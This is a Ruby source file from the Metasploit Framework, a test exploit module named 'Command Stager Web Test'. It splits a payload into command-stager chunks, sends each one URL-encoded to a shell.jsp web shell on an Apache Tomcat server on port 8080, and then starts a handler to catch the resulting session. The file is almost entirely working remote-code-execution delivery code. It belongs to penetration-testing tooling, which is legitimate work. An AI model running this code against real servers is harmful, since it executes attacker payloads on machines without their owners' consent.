metasploit-framework/modules/exploits/test/cmdweb.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	# =( need more targets and perhaps more OS specific return values OS specific would be preferred

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::CmdStager

	def initialize(info = {})
		super(update_info(info,
			'Name'	      => 'Command Stager Web Test',
			'Description'  => %q{
					This module tests the command stager mixin against a shell.jsp application installed
				on an Apache Tomcat server.
			},
			'Author'	=> 'bannedit',
			'Version' => '$Revision$',
			'References' =>
				[
				],
			'DefaultOptions' =>
				{
				},
			'Payload' =>
				{
				},
			'Platform' => 'win',
			'Privileged' => true,
			'Targets' =>
				[
					# need more but this will likely cover most cases
					[ 'Automatic Targeting',
						{
							'auto' => true
						}
					],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Feb 03 2010'))

		register_options(
			[
				Opt::RPORT(8080),
			], self.class)
	end

	def autofilter
		false
	end


	def exploit

		cmd_list = generate_cmdstager()
		http_send_cmd({'uri' => "/shell/shell.jsp?cmd=CMDS"}, cmd_list, delay = 0.5)

		handler

	end


	def http_send_cmd(opts, cmd_list, delay = 0.5)

		total_bytes = 0
		cmd_list.each { |cmd| total_bytes += cmd.length }

		sent = 0
		cmd_list.each { |cmd|
			opts.each { |key, value|
				value.gsub!(/CMDS/, Rex::Text.uri_encode(cmd))

				resp = send_request_raw(opts, 5)
				value.gsub!(Rex::Text.uri_encode(cmd), 'CMDS')

				sent += cmd.length

				# so multi threaded servers can place data in files in the correct order
				select(nil, nil, nil, delay)
			}

			progress(total_bytes, sent)
		}
	end

end